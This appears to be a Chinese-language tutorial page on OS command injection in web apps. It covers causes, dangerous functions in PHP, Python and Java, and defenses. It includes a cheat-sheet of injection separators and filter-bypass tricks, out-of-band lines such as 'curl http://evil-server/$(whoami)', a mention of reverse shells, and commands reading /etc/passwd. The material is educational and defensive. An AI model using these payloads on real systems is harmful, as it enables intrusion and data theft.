赞
踩
命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。
该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。
1.外部参数可控
应用程序调用了执行系统命令的函数,比如服务器程序通过system、eval、exec等函数直接或者间接地调用 cmd.exe。
2.内部拼接命令服务器将 输入的恶意参数拼接到正常命令中 ,从而执行命令造成攻击
高危
黑客如果能够利用命令执行漏洞,那么黑客就可以像电脑用户控制自己电脑一样,自由地对电脑进行操作,比如开启防火墙、添加路由、开启远程服务等等操作
常见危险函数:
PHP
system exec passthru shell_exec popen proc_open
Python
system popen subprocess.call spawn
Java
java.lang.Runtime.getRuntime().exec(command)
常见注入方式 分号分割 || && & 分割 | 管道符 \r\n %d0%a0 换行 反引号解析 $() 替换 无回显技巧 bash反弹shell DNS带外数据 http带外 curl http://evil-server/$(whoami) wget http://evil-server/$(whoami) 无带外时利用 sleep 或其他逻辑构造布尔条件 常见绕过方式 空格绕过 < 符号 cat<123 \t / %09 ${IFS} 其中{}用来截断,比如cat$IFS2会被认为IFS2是变量名。另外,在后面加个$可以起到截断的作用,一般用$9,因为$9是当前系统shell进程的第九个参数的持有者,它始终为空字符串 黑名单绕过 a=l;b=s;$a$b base64 echo "bHM=" | base64 -d /?in/?s => /bin/ls 连接符 cat /etc/pass'w'd 未定义的初始化变量 cat$x /etc/passwd 长度限制绕过 >wget\ >foo.\ >com ls -t>a
不使用时禁用相应函数 尽量不要执行外部的应用程序或命令 做输入的格式检查 转义命令中的所有shell元字符
若有必要使用,那么必须对特殊函数做过滤,对用户输入的命令做检查,对客户端提交的变量在进入执行命令前做好过滤和检查等
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。